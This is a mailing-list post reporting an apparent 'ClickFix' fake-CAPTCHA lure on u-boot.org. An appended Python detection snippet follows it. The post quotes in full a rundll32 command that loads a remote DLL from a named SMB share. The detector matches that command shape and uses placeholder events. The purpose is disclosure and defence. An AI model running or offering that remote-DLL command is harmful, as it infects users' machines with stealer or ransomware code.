Malicious CAPTCHA Popup
zayn beedooles
gb5463348 at gmail.com
Mon Feb 23 07:40:56 CET 2026
I am reporting u-boot.org for hosting a "ClickFix" malware attack. The site
uses a fake Google reCAPTCHA overlay to trick users into running a
malicious command via the Windows Run dialog.
*Malicious Command:* rundll32.exe \\hill-side-view-point.freshhill.ru
\service\verification.google,#1
The command uses rundll32.exe to execute a remote DLL from a Russian SMB
share, bypassing browser sandboxing. HAR logs confirm the site is
compromised and injecting these scripts into the user's session. This is a
high-risk social engineering attack targeting developers.
First, it tells the user to run this in the Run dialog to "continue" using
the website, but it gives the hacker control. It uses the legitimate
Windows `rundll32.exe` utility to execute code outside the browser's safe
"sandbox".
The command points to a remote SMB share on the Russian domain
`hill-side-view-point.freshhill.ru`.
It attempts to load and run a malicious DLL disguised as
`verification.google`, likely an infostealer or ransomware.
I don't know if this may be the wrong person, but I have already reported
the malware and your website to prevent more victims from getting hacked by
Russians. How do I know? "hill-side-view-point.freshhill.ru", it ends with
".ru". Thank you and have a good day.
Sincerely,
Zayn
-------------- next part --------------
A non-text attachment was scrubbed...
Name: Screenshot 2026-02-23 141707.png
Type: image/png
Size: 42007 bytes
Desc: not available
URL: <https://lists.denx.de/pipermail/u-boot/attachments/20260223/6eccb1ea/attachment-0002.png>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: Screenshot 2026-02-23 141646.png
Type: image/png
Size: 272017 bytes
Desc: not available
URL: <https://lists.denx.de/pipermail/u-boot/attachments/20260223/6eccb1ea/attachment-0003.png>
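The following is an added detection example, not part of the original message or of any U-Boot project code. It flags process-creation events where `rundll32.exe` is given a UNC path as its first argument, the command shape reported above. The event field names (`parent`, `cmdline`), the placeholder hosts and the `INTERNAL_SUFFIXES` list are assumptions.

```python
import re

# rundll32 whose first argument is a UNC path (\\host\share\file,entry).
# The file extension is not checked: the reported payload is named
# "verification.google", not *.dll.
RUNDLL32_UNC = re.compile(
    r'\brundll32(?:\.exe)?"?\s+"?\\\\(?P<host>[^\\\s"]+)\\(?P<path>[^,\s"]+)'
    r'(?:\s*,\s*(?P<entry>[^\s"]+))?',
    re.IGNORECASE,
)

# Assumption: DNS suffixes of file servers you operate yourself.
INTERNAL_SUFFIXES = (".corp.example",)

def parse_rundll32_unc(cmdline):
    """Return host/path/entry if rundll32 loads from a UNC path, else None."""
    m = RUNDLL32_UNC.search(cmdline)
    if m is None:
        return None
    host = m.group("host").lower()
    external = "." in host and not host.endswith(INTERNAL_SUFFIXES)
    return {"host": host, "path": m.group("path"),
            "entry": m.group("entry"), "external": external}

def triage(event):
    """'high': external host and parent explorer.exe (as for a command typed
    into the Run dialog); 'review': any other UNC load; None: no match."""
    hit = parse_rundll32_unc(event["cmdline"])
    if hit is None:
        return None
    from_explorer = event["parent"].lower().endswith("explorer.exe")
    return "high" if hit["external"] and from_explorer else "review"

# Constructed process-creation events with placeholder hosts (not real logs).
EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "cmdline": r"rundll32.exe \\files.example.test\service\verification.google,#1"},
    {"parent": r"C:\Windows\explorer.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": r'"C:\Windows\System32\rundll32.exe" \\fs01.corp.example\tools\helper.dll,Start'},
    {"parent": r"C:\Windows\explorer.exe",
     "cmdline": r"notepad.exe \\files.example.test\share\readme.txt"},
]

if __name__ == "__main__":
    for e in EVENTS:
        print(triage(e), "|", e["cmdline"])
```

Blocking outbound SMB (TCP 445) at the network edge stops this load path regardless of whether the event is detected.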